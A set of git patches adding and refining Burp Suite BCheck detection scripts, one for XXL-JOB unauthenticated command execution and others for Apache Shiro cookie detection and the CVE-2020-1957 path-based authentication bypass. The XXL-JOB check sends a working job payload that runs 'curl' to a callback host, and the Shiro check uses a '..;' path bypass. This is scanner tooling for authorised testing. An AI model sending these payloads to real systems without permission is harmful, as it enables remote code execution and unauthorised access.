From 8184daa85c8c0fce3bd8a28d9dcaddd5e4a6aa68 Mon Sep 17 00:00:00 2001
From: QdghJ <qdghj@test.com>
Date: Sat, 7 Oct 2023 16:49:12 +0800
Subject: [PATCH 1/5] add xxl-job rce bcheck

---
 other/xxl-job/xxl_job_rce.bcheck | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 other/xxl-job/xxl_job_rce.bcheck

diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
new file mode 100644
index 0000000..2361b91
--- /dev/null
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -0,0 +1,24 @@
+metadata:
+    language: v1-beta
+    name: "xxl job rce"
+    description: "xxl job rce detection"
+    author: "timeshatter"
+
+define:
+    poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
+
+given request then
+    send request:
+        method: "POST"
+        replacing path: "/run"
+        headers:
+            "Content-Type": "application/json"
+        body: {poc}
+
+    if any interactions then
+        report issue:
+            severity: high
+            confidence: firm
+            detail: "xxl job rce detection."
+            remediation: "Turn on the authentication component that comes with XXL-JOB."
+    end if

From d883428f3ab085e950e073cc2db9d1e303b44d43 Mon Sep 17 00:00:00 2001
From: QdghJ <qdghj@test.com>
Date: Sat, 7 Oct 2023 16:53:16 +0800
Subject: [PATCH 2/5] Optimize shiro detection script

---
 other/shiro/shiro_active.bcheck               | 15 ++++----
 other/shiro/shiro_passive.bcheck              | 14 +++----
 .../CVE-2020-1957-shiro_auth_bypass.bcheck    | 38 ++++++++++---------
 3 files changed, 35 insertions(+), 32 deletions(-)

diff --git a/other/shiro/shiro_active.bcheck b/other/shiro/shiro_active.bcheck
index 39798ec..4c777bf 100644
--- a/other/shiro/shiro_active.bcheck
+++ b/other/shiro/shiro_active.bcheck
@@ -1,9 +1,9 @@
 metadata:
-  language: v1-beta
-  name: "Shiro Cookie Check Active"
-  description: "Detects Shiro Vulnerability by Manipulating Cookie"
-  author: "timeshatter"
-  tags: "Shiro,active"
+    language: v1-beta
+    name: "Shiro Cookie Check Active"
+    description: "Detects Shiro Vulnerability by Manipulating Cookie"
+    author: "timeshatter"
+    tags: "Shiro,active"
 
 define:
     shiroExploit = "rememberMe=1"
@@ -17,8 +17,9 @@ given request then
     
     if "rememberMe=deleteMe" in {check.response} then
         report issue:
-            severity: high
-            confidence: firm
+            severity: info
+            confidence: certain
             detail: {issueDetail}
             remediation: {issueRemediation}
     end if
+    
\ No newline at end of file
diff --git a/other/shiro/shiro_passive.bcheck b/other/shiro/shiro_passive.bcheck
index 8b251d9..37a2ae5 100644
--- a/other/shiro/shiro_passive.bcheck
+++ b/other/shiro/shiro_passive.bcheck
@@ -1,15 +1,15 @@
 metadata:
-  language: v1-beta
-  name: "Shiro Cookie Check Passive"
-  description: "Check for Shiro Vulnerability in Response"
-  author: "timeshatter"
-  tags: "Shiro,passive"
+    language: v1-beta
+    name: "Shiro Cookie Check Passive"
+    description: "Check for Shiro Vulnerability in Response"
+    author: "timeshatter"
+    tags: "Shiro,passive"
 
 given response then
     if "rememberMe=deleteMe" in {latest.response} then
         report issue:
-            severity: high
-            confidence: firm
+            severity: info
+            confidence: certain
             detail: "Shiro Vulnerability Detected: rememberMe=deleteMe"
             remediation: "Investigate and fix the Shiro vulnerability immediately."
     end if
diff --git a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
index 7ebc312..f6718f7 100644
--- a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
+++ b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
@@ -1,24 +1,26 @@
 metadata:
-  language: v1-beta
-  name: "CVE-2020-1957 Shiro AuthBypass"
-  description: "AuthBypass CVE-2020-1957"
-  author: "timeshatter"
-  tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
+    language: v1-beta
+    name: "CVE-2020-1957 Shiro AuthBypass"
+    description: "AuthBypass CVE-2020-1957"
+    author: "timeshatter"
+    tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
 
 given request then
-  send request called check:
-    replacing headers:
-      "Cookie": "rememberMe=1"
+    if not ({base.response.status_code} is  "200") then
+        send request called check:
+            replacing headers:
+             "Cookie": "rememberMe=1"
 
-    if "rememberMe=deleteMe" in {check.response} then
-      send request called auth_pass_check:
-        replacing path: `/xxx/..;{base.request.url.path}`
+        if "rememberMe=deleteMe" in {check.response} then
+            send request called auth_pass_check:
+            replacing path: `/xxx/..;{base.request.url.path}`
 
-        if (not ({check.response.status_code} is  "200")) and {auth_pass_check.response.status_code} is "200" then
-            report issue:
-               severity: high
-               confidence: certain
-               detail: "find shiro AuthBypass CVE-2020-1957"
-               remediation: "update shiro to last."
+            if {auth_pass_check.response.status_code} is "200" then
+                 report issue:
+                     severity: high
+                     confidence: certain
+                     detail: "find shiro AuthBypass CVE-2020-1957"
+                     remediation: "update shiro to last."
+             end if
         end if
-    end if
+    end if
\ No newline at end of file

From 403493be76e8770717214ce37659ea4f828c1785 Mon Sep 17 00:00:00 2001
From: QdghJ <56074352+QdghJ@users.noreply.github.com>
Date: Sat, 7 Oct 2023 17:15:08 +0800
Subject: [PATCH 3/5] Update xxl_job_rce.bcheck

---
 other/xxl-job/xxl_job_rce.bcheck | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
index 2361b91..167e079 100644
--- a/other/xxl-job/xxl_job_rce.bcheck
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -3,6 +3,7 @@ metadata:
     name: "xxl job rce"
     description: "xxl job rce detection"
     author: "timeshatter"
+    tags: "xxl job"
 
 define:
     poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
@@ -18,7 +19,7 @@ given request then
     if any interactions then
         report issue:
             severity: high
-            confidence: firm
+            confidence: certain
             detail: "xxl job rce detection."
             remediation: "Turn on the authentication component that comes with XXL-JOB."
     end if

From 7c36802866a70bd42f29eb76228eba754f3a4719 Mon Sep 17 00:00:00 2001
From: QdghJ <56074352+QdghJ@users.noreply.github.com>
Date: Mon, 9 Oct 2023 09:18:51 +0800
Subject: [PATCH 4/5] change to give host

change to give host
---
 other/xxl-job/xxl_job_rce.bcheck | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
index 167e079..ae5491d 100644
--- a/other/xxl-job/xxl_job_rce.bcheck
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -3,12 +3,11 @@ metadata:
     name: "xxl job rce"
     description: "xxl job rce detection"
     author: "timeshatter"
-    tags: "xxl job"
 
 define:
     poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
 
-given request then
+given host then
     send request:
         method: "POST"
         replacing path: "/run"

From 649f421b0021c06b327fa44ee62187b25079bbc2 Mon Sep 17 00:00:00 2001
From: QdghJ <56074352+QdghJ@users.noreply.github.com>
Date: Mon, 9 Oct 2023 09:25:37 +0800
Subject: [PATCH 5/5] Update xxl_job_rce.bcheck

add tags
---
 other/xxl-job/xxl_job_rce.bcheck | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
index ae5491d..d928b93 100644
--- a/other/xxl-job/xxl_job_rce.bcheck
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -3,6 +3,7 @@ metadata:
     name: "xxl job rce"
     description: "xxl job rce detection"
     author: "timeshatter"
+    tags: "xxl job"
 
 define:
     poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
@@ -10,7 +11,7 @@ define:
 given host then
     send request:
         method: "POST"
-        replacing path: "/run"
+        path: "/run"
         headers:
             "Content-Type": "application/json"
         body: {poc}